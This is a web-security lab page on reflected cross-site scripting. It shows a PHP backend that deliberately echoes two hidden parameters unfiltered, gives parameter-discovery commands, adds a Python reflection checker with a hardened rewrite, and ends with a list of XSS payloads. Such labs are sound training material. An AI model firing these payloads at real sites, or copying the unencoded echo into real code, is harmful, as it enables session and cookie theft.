Multi-Parameter XSS Lab

Test XSS across multiple parameters with different security levels

Multiple Parameter Challenge

Lab Overview

This lab contains multiple parameters with different security implementations. Some parameters use secure encoding while others have no filtering at all.

Visible Parameters: fname and lname use secure HTML encoding with htmlspecialchars().
Hidden Parameters: There are additional parameters not shown in the main form. Use tools like Arjun to discover them!
Parameter Security Levels:
  • Secure: fname, lname, page_id - uses htmlspecialchars()
  • Vulnerable: ll, ptu - no filtering (direct output)
  • Method: all parameters use GET
  • Multiple: 4 total parameters to test
  • Overall Security Level: Mixed Implementation

Objective: Discover all parameters and identify which ones are vulnerable to XSS attacks.

Backend Source Code
<?php
// Visible parameters: encoded with htmlspecialchars() before output (secure).
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
// Hidden parameter, also encoded (secure).
elseif(isset($_GET["page_id"])){
    echo htmlspecialchars($_GET["page_id"], ENT_QUOTES);
}
// Hidden parameters echoed with no filtering: the deliberately vulnerable sinks.
elseif(isset($_GET["ll"])){
    echo $_GET["ll"];
}
elseif(isset($_GET["ptu"])){
    echo $_GET["ptu"];
}
# use arjun tool to find hidden parameter
Test Input Forms
Visible Parameters (HTML Encoded):
  • fname - this parameter uses htmlspecialchars() encoding
  • lname - this parameter uses htmlspecialchars() encoding
Hidden Parameters
Hint: Some parameter names are not shown in the main form. You need to discover them using parameter discovery tools.
  • page_id - this parameter uses htmlspecialchars() encoding
  • ll - this parameter has NO filtering (direct output)
  • ptu - this parameter has NO filtering (direct output)
Parameter Discovery & Testing Guide
Parameter Discovery Tools:
  • Arjun: arjun -u https://example.com
  • ParamSpider: python3 paramspider.py -d example.com
  • FFUF: ffuf -w wordlist.txt -u https://example.com?FUZZ=test
  • Manual testing: Try common parameter names
Testing Strategy:
  • Test all discovered parameters with XSS payloads
  • Focus on parameters without output encoding
  • Try different contexts (HTML, JavaScript, attributes)
  • Use both reflected and stored XSS techniques
  • Check for DOM-based XSS in client-side code
Security Implications

This lab demonstrates:

  • Mixed security implementations create vulnerabilities
  • Hidden parameters are often overlooked in security testing
  • Inconsistent filtering leads to security gaps
  • Parameter discovery is critical for comprehensive testing
  • Even a single vulnerable parameter can compromise the application
  • Security must be consistent across all endpoints and parameters
Best Practices

For secure web applications:

  • Use consistent output encoding across all parameters
  • Implement Content Security Policy (CSP) headers
  • Validate and sanitize all user inputs
  • Use parameter allowlists instead of discovery-based security
  • Conduct comprehensive security testing
  • Document all API endpoints and parameters
  • Use security headers such as X-Content-Type-Options (X-XSS-Protection is deprecated in modern browsers and should not be relied on; CSP is the effective control)
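The following is an added example and not the lab's own code: a Python model of the PHP backend shown above, an offline reflection check of the kind the Testing Strategy asks for (classifying each parameter as encoded or raw), and a hardened handler that applies the Best Practices of one consistent encoder plus a parameter allowlist and security headers. Parameter names and behaviours are taken from the lab page; the canary string, the filler partner values for the fname/lname pair, and all function names are this example's own assumptions. html.escape() stands in for htmlspecialchars(ENT_QUOTES); it emits &#x27; for the apostrophe where PHP emits &#039;, which does not affect the result.

```python
"""Added example (not the lab's own code): a Python model of the lab's PHP
backend, an offline reflection check that classifies each parameter as
encoded or raw, and a hardened handler that applies one consistent policy."""
import html
from collections.abc import Callable, Mapping

# Parameter names and their documented behaviour are taken from the lab page.
SECURE_PARAMS = ("fname", "lname", "page_id")
VULNERABLE_PARAMS = ("ll", "ptu")
ALL_PARAMS = SECURE_PARAMS + VULNERABLE_PARAMS

# The lab's fname/lname branch only fires when both are present, so the check
# must send a filler partner value when probing either of them (assumption).
LAB_COMPANIONS = {"fname": {"lname": "x"}, "lname": {"fname": "x"}}

# Constructed marker: unlikely to occur naturally and containing every
# character that htmlspecialchars(ENT_QUOTES) must neutralise.
CANARY = "zq7<\"'&>zq7"

Handler = Callable[[Mapping[str, str]], str]


def php_htmlspecialchars(value: str) -> str:
    """Model of htmlspecialchars($v, ENT_QUOTES): & < > " ' become entities.
    (Python emits &#x27; for the apostrophe where PHP emits &#039;; both are safe.)"""
    return html.escape(value, quote=True)


def lab_handler(get: Mapping[str, str]) -> str:
    """Mirror of the lab's PHP control flow; the raw echoes are kept on purpose."""
    if "fname" in get and "lname" in get:
        return php_htmlspecialchars(get["fname"]) + php_htmlspecialchars(get["lname"])
    if "page_id" in get:
        return php_htmlspecialchars(get["page_id"])
    if "ll" in get:
        return get["ll"]   # no filtering: direct output
    if "ptu" in get:
        return get["ptu"]  # no filtering: direct output
    return ""


def hardened_handler(get: Mapping[str, str]) -> str:
    """Hardened rewrite: every accepted parameter goes through the same encoder,
    and names outside the allowlist are never echoed, so a parameter that a
    discovery tool turns up later cannot become an unencoded sink."""
    return "".join(php_htmlspecialchars(get[name]) for name in ALL_PARAMS if name in get)


def security_headers() -> dict[str, str]:
    """Response headers that back up output encoding with defence in depth."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                                   "object-src 'none'; base-uri 'none'",
        "X-Content-Type-Options": "nosniff",
    }


def reflection_report(handler: Handler, names, companions=None) -> dict[str, str]:
    """Send the canary through each parameter and classify the reflection:
    'raw' (canary echoed verbatim), 'encoded' (entities applied) or 'not-reflected'."""
    companions = companions or {}
    report = {}
    for name in names:
        request = {**companions.get(name, {}), name: CANARY}
        body = handler(request)
        if CANARY in body:
            report[name] = "raw"
        elif php_htmlspecialchars(CANARY) in body:
            report[name] = "encoded"
        else:
            report[name] = "not-reflected"
    return report


def raw_parameters(handler: Handler, names, companions=None) -> list[str]:
    """Names whose reflection is unencoded: the findings a regression test should fail on."""
    return [n for n, s in reflection_report(handler, names, companions).items() if s == "raw"]


if __name__ == "__main__":
    for label, h in (("lab backend", lab_handler), ("hardened backend", hardened_handler)):
        print(label, reflection_report(h, ALL_PARAMS, LAB_COMPANIONS))
```

Run against the model of the lab, the report marks ll and ptu as raw and the three encoded parameters as encoded; against the hardened handler every parameter is encoded and an unknown name such as debug is not reflected at all. Wired into a test suite, raw_parameters() returning a non-empty list is the regression signal that a new or forgotten parameter has bypassed the encoding policy.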
XSS Payload Examples for Vulnerable Parameters
Basic Script Tags:
  • <script>alert(1)</script>
  • <script>alert(document.domain)</script>
  • <script>alert(document.cookie)</script>
Event Handlers:
  • <img src=x onerror=alert(1)>
  • <body onload=alert(1)>
  • <svg onload=alert(1)>
JavaScript Protocol:
  • <a href="javascript:alert(1)">click</a>
  • <iframe src="javascript:alert(1)"></iframe>
  • <form action="javascript:alert(1)"><input type=submit></form>
Advanced Techniques:
  • <script src="data:text/javascript,alert(1)"></script>
  • <object data="javascript:alert(1)"></object>
  • <embed src="javascript:alert(1)"></embed>